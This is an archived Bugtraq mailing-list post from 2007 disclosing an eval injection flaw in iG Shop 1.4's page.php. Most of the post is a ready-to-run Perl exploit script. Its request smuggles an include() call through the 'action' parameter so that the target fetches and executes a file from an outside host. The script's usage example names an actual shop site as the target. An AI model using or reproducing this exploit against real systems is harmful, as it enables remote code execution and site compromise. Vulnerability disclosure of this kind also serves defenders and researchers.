| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-ID: <20070619064954.9648.qmail@securityfocus.com>
Date: 19 Jun 2007 06:49:54 -0000
From: ifx@...u.us
To: bugtraq@...urityfocus.com
Subject: iG Shop 1.4 eval Inclusion Vulnerability
#!/usr/bin/perl -w
use LWP::UserAgent;
####################################################################
#iG Shop 1.4 eval Inclusion Vulnerability
#found by IFX #nyubicrew
#Vulnerability on page.php
#if (!$action)
# $action = "make";
#// here the function will be called.
#eval ("page_$action();");
####################################################################
die "Example: perl $0 http://www.planetgolfuk.co.uk/shop\n" unless @ARGV;
$b = LWP::UserAgent->new() or die "Could not initialize browser\n";
$b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');
$url = $ARGV[0] . "/page.php?action=|include(\$_GET\[cok\]);//phpinfo&cok=http://h1.ripside.net/ifx/a.txt?";
$res = $b->request(HTTP::Request->new(GET=>$url));
$respone = $res->content;
if ($respone =~ /nyelipin file ;P/i){
print "\nTembus...\n";
print "\n$url\n";
}
else{
print "\nGagal cok...\n";
}
Powered by blists - more mailing lists